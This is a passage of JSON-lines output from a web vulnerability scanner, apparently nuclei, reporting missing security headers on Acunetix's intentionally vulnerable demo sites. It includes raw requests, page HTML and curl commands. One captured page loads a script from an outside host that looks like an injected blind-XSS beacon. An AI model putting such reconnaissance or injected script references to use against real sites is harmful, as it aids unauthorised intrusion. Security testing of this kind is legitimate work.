href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:23.424513656Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:23.724473109Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n 